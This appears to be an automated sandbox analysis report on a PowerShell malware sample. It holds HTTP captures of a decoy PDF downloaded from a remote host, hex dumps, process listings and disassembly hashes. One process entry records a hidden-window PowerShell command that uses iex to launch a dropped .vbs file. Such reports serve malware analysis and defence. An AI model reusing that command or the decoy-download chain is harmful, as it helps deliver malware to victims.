                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.749701107.161.23.1504437272C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-19 11:48:24 UTC127OUTGET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                                            Host: www.astenterprises.com.pk
                                                                                            Connection: Keep-Alive
                                                                                            2024-12-19 11:48:24 UTC217INHTTP/1.1 200 OK
                                                                                            Connection: close
                                                                                            content-type: application/pdf
                                                                                            last-modified: Sun, 28 Jan 2024 19:03:01 GMT
                                                                                            accept-ranges: bytes
                                                                                            content-length: 871324
                                                                                            date: Thu, 19 Dec 2024 11:48:24 GMT
                                                                                            server: LiteSpeed
                                                                                            2024-12-19 11:48:24 UTC16384INData Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 45 33 39 35 37 36 43 34 37 35 41 42 45 43 34 33 41 31 38 37 42 39 44 37 38 30 43 34 37 35 37 44 3e 3c 36 34 31 43 41 32 38 37 30 33 43 34 42 31 34 34 38 38 36 46 33 34 32 30 32 33 42 33 34 35
                                                                                            Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: 4b 4b 4b f4 b8 e9 cf 0b a9 9e 76 d3 14 23 28 9c 68 17 25 44 45 32 9b e4 30 63 de da 74 55 51 91 17 0f 23 b9 74 42 79 99 8f 15 a5 ab 6a 2d 56 56 3a 41 91 9b da fa 0f ac 3d b1 66 fa f2 fe 83 1f ae 7f f5 f4 91 8d 1b 8f 1c 79 71 63 43 8e f6 13 91 4c 3d ba a0 bb 30 72 b9 50 28 fc b1 6b ef 29 f2 46 e1 b5 4f 6f 93 56 b2 fc d6 f7 7f 8a 68 bc 82 40 bb 8f 18 d3 88 9b 23 ac 5b 1b 5f f9 98 a0 8d 65 0b c6 04 6d 34 17 e3 49 b1 4b 9a 05 db b4 aa db c4 4d 74 17 dd e7 12 8f 8a 44 05 59 a2 82 2a 11 83 92 4b 9a 93 5d 8d ef 13 90 04 7a cd 8f 5c 75 ce 6c 14 6e da 96 03 d7 98 03 57 b7 03 57 cc 96 1d e6 60 1c 43 9c 83 be 88 21 d9 a6 a7 5a e2 b6 dc dc 96 44 12 92 2d 51 29 ac 9f 21 19 b2 05 46 a9 ba 6a 74 47 9c 0b 07 a3 b5 30 cb 0f c6 7a be 33 90 c3 d2 e3 5c 51 1b 63 53 65 5b 92
                                                                                            Data Ascii: KKKv#(h%DE20ctUQ#tByj-VV:A=fyqcCL=0rP(k)FOoVh@#[_em4IKMtDY*K]z\ulnWW`C!ZD-Q)!FjtG0z3\QcSe[
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: ed 2b 5d eb ed eb 5d 1c 2a ad 66 a8 50 9d 10 15 d2 5d 0e 75 89 22 17 a4 6d 26 47 51 ca 35 42 88 c3 b3 09 47 4c 80 b6 92 8c b5 95 6c 19 f8 f6 d9 f7 91 fa dc ad 57 af 4d dc fe d5 c9 be 57 4e 0e ee ea 3b c9 fa 50 6a f7 f6 89 bf 8d 5f bc f5 0d 14 41 ee 0b e7 2f fc f9 ec f9 73 e4 27 f5 4d 74 70 75 84 2a 2f 13 41 57 a8 0a f5 4a f8 01 fc 45 dc 8a b9 5c f4 78 94 ad 8d 4e 93 e2 35 99 40 a6 66 61 cd e6 68 7f d4 d9 1c 6c 36 96 05 97 19 ab 9d 6b a5 62 b0 68 74 3a 37 49 1d b8 3b b8 c9 18 89 5e f2 5f d5 ae 86 2e 45 6e f8 6f 44 ae 47 27 a3 6a 9c 6b c4 8d 81 59 5c 33 7e 98 5b 86 d7 e0 bf 8b b7 6a 26 b0 a8 c8 36 35 1c 06 a3 55 c3 b2 c8 c8 7a 15 50 ba 05 28 7d 0a a8 70 41 4f 8c 0a 08 0b 79 a1 5d d8 29 70 51 8a 55 94 22 26 0c 4f 8e e5 45 80 4b d0 2a 9f c1 70 69 f1 31 e5 4b
                                                                                            Data Ascii: +]]*fP]u"m&GQ5BGLlWMWN;Pj_A/s'Mtpu*/AWJE\xN5@fahl6kbht:7I;^_.EnoDG'jkY\3~[j&65UzP(}pAOy])pQU"&OEK*pi1K
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: f0 0a e0 02 58 65 b0 11 40 67 2b c0 87 c0 35 fc 13 79 8d 58 c0 10 a0 b2 bf 79 e8 c6 67 1f 79 46 9e e7 3a d8 5f d9 fb 64 23 66 fc 2f ec 03 c9 1f 62 57 13 fc 67 f6 ae e4 2b e0 38 78 85 bd e7 c5 39 c9 b5 22 4f 50 27 22 4e 29 e0 34 f2 f7 b1 77 e6 ba a3 bc 9e 6b c7 f1 1c 8f 19 36 0d 64 81 41 60 0c 98 05 5a d8 25 d6 e5 3d c5 a3 68 64 89 ac e0 fd e7 cc 23 5f 4b 7e 8d bc aa 12 eb 19 6e 19 7b b1 00 75 61 8c dd 8f c2 83 39 a7 9f 33 98 65 9c f9 23 8a c2 18 a7 7f 0b 4f 18 e3 97 bf 81 27 8c f1 b3 13 f0 84 31 9e 3b 06 4f 18 e3 a9 67 e0 09 63 8c 8e c1 13 c6 18 1c 81 07 e3 b3 97 df ea fe 31 cf 0c 3e 4b f5 5c 98 cd 60 96 66 30 4b 33 98 a5 19 12 64 33 e2 47 6e 07 c5 d8 fe e4 f5 f4 60 c6 ce 5a e6 e6 1e ee 2c 52 e7 6d ea ec a7 ce ab d4 99 a4 ce 71 ea 9c a0 ce 1e ea 1c a2 8e
                                                                                            Data Ascii: Xe@g+5yXygyF:_d#f/bWg+8x9"OP'"N)4wk6dA`Z%=hd#_K~n{ua93e#O'1;Ogc1>K\`f0K3d3Gn`Z,Rmq
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: e6 09 e6 76 33 e7 20 39 5e d7 78 5c 72 bd 06 f7 03 59 e9 3e 2d 95 8a b9 83 39 2b 4d 32 5a 61 cf 2e f3 cb 65 b2 fb 90 ac 63 6f ef a1 bc c6 ed 21 4b fd 91 c4 9b 86 33 5f 20 23 19 ff 3c c6 9a 44 ce d9 ac df cc 33 8c 73 34 a2 45 46 69 ce e6 3f 28 cd de 50 6c 32 6a e3 d5 61 e7 b7 73 2e 74 1f 6e 92 02 3f 87 75 3e ab 77 4d 78 18 bd 03 a8 d6 fd 61 af b3 fc 7b d8 7b a4 de 55 9c d7 a9 e6 59 d6 e5 b0 3d 47 55 71 1d 1d 72 4c 4b 78 9a f1 b2 e8 9b 85 14 fa ab cc e1 7f 39 cc b7 27 ef f3 fd 27 a5 80 3b b0 98 fb 6c 8a 5f c2 7a ed 95 6e f6 ae 65 fd fd e1 32 d0 ea 73 44 1a 33 72 39 2b bf 97 89 de 11 fa 6f 0a 5b bd de d8 60 0f b9 87 b6 33 19 6b 86 de 8b cc ab 21 73 b6 38 e6 a3 f0 44 e0 c9 4d c6 c8 f5 fc c3 f3 7e 9c d4 55 63 44 7c 64 a1 5b 2c 23 9d 33 52 18 4c a7 ff e7 ac 41
                                                                                            Data Ascii: v3 9^x\rY>-9+M2Za.eco!K3_ #<D3s4EFi?(Pl2jas.tn?u>wMxa{{UY=GUqrLKx9'';l_zne2sD3r9+o[`3k!s8DM~UcD|d[,#3RLA
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 00 3f 00 c0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66
                                                                                            Data Ascii: C?"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdef
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: 42 63 f6 91 ac 1c 27 a7 50 cf 3e 4d fa d1 56 75 d0 ba c5 64 81 1a e6 4c e6 58 0c d5 26 8d 98 fa 33 16 57 24 7e ce 0d 4d b4 4e e0 f1 9d a4 83 d6 ad f8 85 85 a3 92 91 35 88 bd 03 2b 42 68 57 83 ca 8b eb 0a 26 10 84 26 17 0f 24 e1 b0 a4 2a f0 34 91 e7 9e c9 ab bc 37 82 b3 3c e6 68 87 ab e0 87 8c 95 38 94 3f 89 f6 74 69 2e 63 10 88 29 1a de d4 82 08 7f 0f d5 a4 1b 8d 61 79 c7 6f 9d e0 37 4a 89 38 17 e9 e4 95 dd 0d 7d 4f b3 30 56 d1 0f 1c 57 76 69 e3 4b 9b 0b d3 f3 e3 1a d9 e4 26 c2 70 53 39 67 76 0d 9f 1c f4 20 16 3a db 45 1d c7 b7 5c d1 9f 30 3d 72 3f aa ba 3c 22 fd 70 1b 45 03 b3 43 32 bf d8 82 1f e4 4f 1d 0f 11 35 f9 12 53 6d 59 4a 7b 27 f0 ef 43 32 e2 85 41 65 c5 a3 51 82 27 2e 9e 0e 45 46 7d 6b 32 7c 43 4a 16 e0 ee b0 58 c2 df 44 9e b6 f4 11 a9 53 55 b4
                                                                                            Data Ascii: Bc'P>MVudLX&3W$~MN5+BhW&&$*47<h8?ti.c)ayo7J8}O0VWviK&pS9gv :E\0=r?<"pEC2O5SmYJ{'C2AeQ'.EF}k2|CJXDSU
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: 74 f9 ed f0 78 28 61 e2 0c 41 23 be 47 c9 59 95 29 28 4a 96 a2 02 52 09 24 ec 00 dc c5 44 80 24 ab 2e a9 da ee 77 e0 9a 05 5c 51 a7 2a 92 c8 9b b9 49 6d 4e a7 8a f6 e9 c5 d7 a7 b6 18 47 ea ce ed 40 04 cf 01 f3 af 70 ac 7e 19 60 04 e7 fb fc 28 5c f7 6a 0c bd 93 ae 4b d1 0d 4e 58 cd 4c 14 a5 08 0f 37 7b ab 41 a5 ef bf 9e dc af 16 60 b0 e3 3d cc 6d 0b 4d 78 5b f6 55 58 87 e9 b5 ae 24 43 a0 f2 93 9f 94 3c 96 c3 d2 aa 72 d5 79 26 67 a5 16 16 cb e8 4a d2 52 6e 2c a1 71 af 3b f2 f6 c1 ec 38 6e 2d 22 14 58 f0 f1 23 fd e5 9c 2c 8c 41 4d 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 fc 3b 1b 6f 63 68 e3 ac 79 1f 65 d1 71 36 91 2b c0 4f f8 ab 4a e2 aa 9c d4 9c 85 04 4d ad 6f 39 c0 13 2e 16 4e a7 84 7e e7 98 f1 f5 eb 18
                                                                                            Data Ascii: tx(aA#GY)(JR$D$.w\Q*ImNG@p~`(\jKNXL7{A`=mMx[UX$C<ry&gJRn,q;8n-"X#,AM H"AD$ H"AD$ H";ochyeq6+OJMo9.N~
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: e4 47 fa 93 f1 82 27 78 df fe 44 7f a9 3f 18 22 fa 04 1d 41 04 75 06 f0 45 fb 04 48 22 41 12 08 90 44 82 24 11 20 89 04 51 dc 55 50 99 a6 50 a7 e7 25 10 5c 7d 96 1c 5b 69 4e a7 89 29 24 73 07 d9 ee de 08 bc 08 cf be dc 5d a0 f0 56 33 a8 d2 a8 18 6e a5 31 26 cc cb a8 6d 6d b0 f2 92 52 95 90 08 e1 04 6d ee 1e b8 22 a2 7f c4 57 b5 07 f4 9d 57 ea d3 1f 82 08 9f e2 2b da 83 fa 4e ab f5 69 8f c1 04 4f f1 15 ed 41 fd 27 55 fa b4 c7 e0 82 27 f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 16 5a 8b ff 00 10 4e d3 b5 39 e6 a5 1c c2 d5 54 25 c5 24 15 7c 9e 60 68 4d b7 29 02 08 a5 d8 bb b7 0f 69 7c 3e d3 2f cb e1 ba a3 a5 c4 05 10 18 7c f2 3a 58 03 b5 fa 0f 3e a4 55 df f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 13 fc 45 7b 50 7f 49 d5 7e ad 31 f8 20 89 fe 22 bd a8 3f a4 ea bf 56 98 fc
                                                                                            Data Ascii: G'xD?"AuEH"AD$ QUPP%\}[iN)$s]V3n1&mmRm"WW+NiOA'U'ZcAZN9T%$|`hM)i|>/|:X>UZcAE{PI~1 "?V
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: 65 4a 6b 65 99 59 69 a6 d1 2e 92 09 42 56 9d 76 36 de de ee 91 3f a8 5c e0 5f 5b 77 e3 3c 3f c5 d2 61 a4 01 53 f1 61 dd 5d 12 d9 1d 42 6b 0c 37 40 71 c6 94 df 77 c2 a0 a5 a4 83 70 01 dc f3 3e be 57 b4 31 5f be e0 40 10 00 be 7d bd b9 8a 65 3d 97 15 d8 04 b8 5c 83 c0 88 f9 a2 a4 2b 1d 8b 70 55 46 a6 cd 41 29 97 42 d0 b0 b5 5b 80 5f 5b f5 d6 e0 ef 6f 2d 74 8e 37 10 b5 e5 c3 3c b9 5b ad bc 99 96 36 33 b1 a6 69 37 fc a9 0a 7b 33 ca 4a 38 c3 12 33 68 6e 4d 01 21 68 4a 85 ac 39 1b 5b 71 ef bd b4 b4 0e 21 79 fb e4 89 91 a0 a1 1c ce 53 6f 85 43 bf ac 34 41 f2 de 4d 55 e1 86 b2 e5 9c 31 26 d4 b4 84 cb 69 03 84 2c 85 01 73 a7 4d 2d e0 7a f2 8e e2 62 17 d2 c3 f7 3f ee aa b0 cb 9a 6f 47 0d 3c 8c a4 4d 57 1e 62 e5 7c 8e 39 a1 2a 4a 69 e6 94 e7 00 40 5f 12 7f 7a da eb
                                                                                            Data Ascii: eJkeYi.BVv6?\_[w<?aSa]Bk7@qwp>W1_@}e=\+pUFA)B[_[o-t7<[63i7{3J83hnM!hJ9[q!ySoC4AMU1&i,sM-zb?oG<MWb|9*Ji@_z


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:06:48:12
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1"
                                                                                            Imagebase:0x7ff741d30000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:06:48:12
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:06:48:14
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'"
                                                                                            Imagebase:0x7ff741d30000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:11
                                                                                            Start time:06:48:25
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                                                            Imagebase:0x7ff702560000
                                                                                            File size:5'641'176 bytes
                                                                                            MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:12
                                                                                            Start time:06:48:26
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                            Imagebase:0x7ff6c3ff0000
                                                                                            File size:3'581'912 bytes
                                                                                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:13
                                                                                            Start time:06:48:27
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                            Imagebase:0x7ff7b4ee0000
                                                                                            File size:55'320 bytes
                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:14
                                                                                            Start time:06:48:27
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1736,i,1938861957224451301,13168527261703212553,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                            Imagebase:0x7ff6c3ff0000
                                                                                            File size:3'581'912 bytes
                                                                                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Executed Functions

                                                                                              Function 00007FFAAC674F1A Relevance: 1.7, Strings: 1, Instructions: 449COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1518244303.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffaac670000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ?_H
                                                                                              • API String ID: 0-1095511010
                                                                                              • Opcode ID: d30a5f3ce1a8fbd17656e5a22fe60173a6d5f6eda933cfcf9a50b59dd9bf0c69
                                                                                              • Instruction ID: c80a6fe64160c34ef51e1c43e7a2edeeab91eabf20537b9c050e40a4adca1db2
                                                                                              • Opcode Fuzzy Hash: d30a5f3ce1a8fbd17656e5a22fe60173a6d5f6eda933cfcf9a50b59dd9bf0c69
                                                                                              • Instruction Fuzzy Hash: 44D1466190EB9A8FFBA6E76888159B97FD2EF46310B0855FAD04EC7093DD18D809C3D1
                                                                                              Function 00007FFAAC675127 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1518244303.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffaac670000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ?_H
                                                                                              • API String ID: 0-1095511010
                                                                                              • Opcode ID: 0ded3fd9d02986259d6700131fb9534cdad0f1dc0e13d6c16e4b9e12d06b5c35
                                                                                              • Instruction ID: bacd31057e6c00408b3e7beb01a91fc6d7175590a1662ee6ae93b67a2b45a1f8
                                                                                              • Opcode Fuzzy Hash: 0ded3fd9d02986259d6700131fb9534cdad0f1dc0e13d6c16e4b9e12d06b5c35
                                                                                              • Instruction Fuzzy Hash: 3611E031A0E75A8FFB66DB9884806B86792EB4A302F1864FAC40EC3182D9259C498390
                                                                                              Function 00007FFAAC6721C4 Relevance: .1, Instructions: 98COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1518244303.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffaac670000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d5b8eaf07efbd6151b95f6d583b47b71dce94720b6ce1b3af409c47b48267563
                                                                                              • Instruction ID: 125217d58a3712416f1f92ae46039165ebf4b077036e9d2d59c79829df30f59f
                                                                                              • Opcode Fuzzy Hash: d5b8eaf07efbd6151b95f6d583b47b71dce94720b6ce1b3af409c47b48267563
                                                                                              • Instruction Fuzzy Hash: 66213472E0EB5ACBF3A6D728485057867C2EF82310B69A8BAD01DC3993ED19DC094285
                                                                                              Function 00007FFAAC5A3BB5 Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1517603130.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffaac5a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                              • Instruction ID: 17364a7ed5c721308ba304accf623cb31311e560d270a2ff844f7884f510332f
                                                                                              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                              • Instruction Fuzzy Hash: 1D01A77010CB0C8FD744EF0CE051AA5B3E0FB99324F10052DE58AC3661DA32E882CB41

                                                                                              Non-executed Functions

                                                                                              Function 00007FFAAC5A1DC5 Relevance: 5.9, Strings: 4, Instructions: 891COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1517603130.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffaac5a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8D*$@rJ$HI*$U*
                                                                                              • API String ID: 0-2489705372
                                                                                              • Opcode ID: 4f761e70dcb8e407cdcfd39c23e365732a9e7ea98703a8eeab156ab5026bc0e2
                                                                                              • Instruction ID: 7c2d29c8de7ffa07c2f009440db7504e0a50f043e3ad44a6b77f3ff922121c71
                                                                                              • Opcode Fuzzy Hash: 4f761e70dcb8e407cdcfd39c23e365732a9e7ea98703a8eeab156ab5026bc0e2
                                                                                              • Instruction Fuzzy Hash: AA2293A794F7C38FF3124B699C6A0E57FA4EF5362470941F7E0CC8A093E919580E87A1
                                                                                              Function 00007FFAAC5A1FB5 Relevance: 5.4, Strings: 4, Instructions: 419COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1517603130.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffaac5a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8D*$@rJ$HI*$U*
                                                                                              • API String ID: 0-2489705372
                                                                                              • Opcode ID: 454706121f72a50ea2221933bf914e58df956e465e196503400453dd89e2eee8
                                                                                              • Instruction ID: 589be2d07c4a6d4591d03ba75dd78d6b049a2dd036249b4a515f336e21df79f6
                                                                                              • Opcode Fuzzy Hash: 454706121f72a50ea2221933bf914e58df956e465e196503400453dd89e2eee8
                                                                                              • Instruction Fuzzy Hash: 82D1B5A794F7C78FF3124B695C6A0E57FA4EF5366470941F7E0CC8A093E819580A87E1

                                                                                              Executed Functions

                                                                                              Function 00007FFAAC643135 Relevance: .4, Instructions: 445COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
